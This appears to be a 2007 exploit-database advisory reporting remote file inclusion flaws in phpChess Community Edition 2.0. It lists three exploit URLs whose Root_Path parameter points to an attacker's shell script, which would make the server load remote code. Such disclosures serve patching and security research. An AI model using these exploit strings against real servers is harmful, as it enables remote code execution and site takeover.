id: 1818
date: 05/02/2007
title: phpChess Community Edition 2.0 Multiple RFI Vulnerabilities
author: GoLd_M
cves: 

===========================================================
phpChess Community Edition 2.0 Multiple RFI Vulnerabilities
===========================================================



# phpChess Community Edition 2.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.phpchess.net/index-3.html
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
# Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
# Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell





#  0day.today [2023-03-22]  #